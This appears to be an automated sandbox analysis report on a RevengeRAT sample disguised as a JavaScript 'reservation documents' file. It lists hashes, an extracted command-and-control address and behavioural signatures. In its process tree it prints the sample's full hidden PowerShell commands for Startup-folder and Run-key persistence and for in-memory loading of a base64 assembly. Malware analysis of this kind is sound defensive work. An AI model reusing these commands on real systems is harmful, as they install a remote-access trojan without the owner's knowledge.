Analysis
-
max time kernel
120s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-10-2024 15:21
Static task
static1
Behavioral task
behavioral1
Sample
1Documentos de reserva.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1Documentos de reserva.js
Resource
win10v2004-20241007-en
General
-
Target
1Documentos de reserva.js
-
Size
60KB
-
MD5
14e68a45361bb287393747ce2b271838
-
SHA1
16144ac8dc7ecc27e4667a3241da8810f8b84778
-
SHA256
213857b03db27acb0cb52357799ba8f3ce4adb843e66ddc35bf8949d10ebd61a
-
SHA512
1a865076c36fa8bf69eba5aca97298be88b093f50af16b63ac878a6482f928c418e547296d00075e1a27c85580af337e8f41781180eee50755754d8915dbe8fb
-
SSDEEP
768:tvRmozOfNAG9lUAy1NgRXbkDvAAdkqC9m3ppOJlPcLNdpgF3hFAto:94oifpTq1NxAAiqC9mZpk8NdpW3hF2o
Malware Config
Extracted
revengerat
NyanCatRevenge
54.146.241.16:5222
f9796de67e
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 2776 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2908 powershell.exe 2776 powershell.exe 2164 powershell.exe 2768 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Documentos de reserva.js powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\cocacola = "C:\\Users\\Admin\\AppData\\Roaming\\1Documentos de reserva.js" powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2164 powershell.exe 2908 powershell.exe 2768 powershell.exe 2776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
wscript.exepowershell.exewscript.exedescription pid process target process PID 2512 wrote to memory of 2164 2512 wscript.exe powershell.exe PID 2512 wrote to memory of 2164 2512 wscript.exe powershell.exe PID 2512 wrote to memory of 2164 2512 wscript.exe powershell.exe PID 2164 wrote to memory of 2808 2164 powershell.exe wscript.exe PID 2164 wrote to memory of 2808 2164 powershell.exe wscript.exe PID 2164 wrote to memory of 2808 2164 powershell.exe wscript.exe PID 2808 wrote to memory of 2768 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2768 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2768 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2908 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2908 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2908 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2776 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2776 2808 wscript.exe powershell.exe PID 2808 wrote to memory of 2776 2808 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\1Documentos de reserva.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\1Documentos de reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\1Documentos de reserva.js'));wscript 'C:\Users\Admin\AppData\Roaming\1Documentos de reserva.js'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Roaming\1Documentos de reserva.js"3⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\1Documentos de reserva.js' -PropertyType String -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\1Documentos de reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\1Documentos de reserva.js'))"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD514e68a45361bb287393747ce2b271838
SHA116144ac8dc7ecc27e4667a3241da8810f8b84778
SHA256213857b03db27acb0cb52357799ba8f3ce4adb843e66ddc35bf8949d10ebd61a
SHA5121a865076c36fa8bf69eba5aca97298be88b093f50af16b63ac878a6482f928c418e547296d00075e1a27c85580af337e8f41781180eee50755754d8915dbe8fb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d74bfe2cf9957037f3c18ef59b7ba7df
SHA1b3526122fbcaf4c81694c775baa56ed790dd571e
SHA256f5cc0c1c1adaa2ca7dce3cd70f565afb51ec621304acb6d7c968fe01878442c1
SHA512a663af81df1498816d8f5ab50a3ade6c95f06508e04e0d031c0bfd288266e7ad9ee369bdbe4f62607e2b27fe48d2a1e31884ca410aefed1d46cae5aa05eb8ab6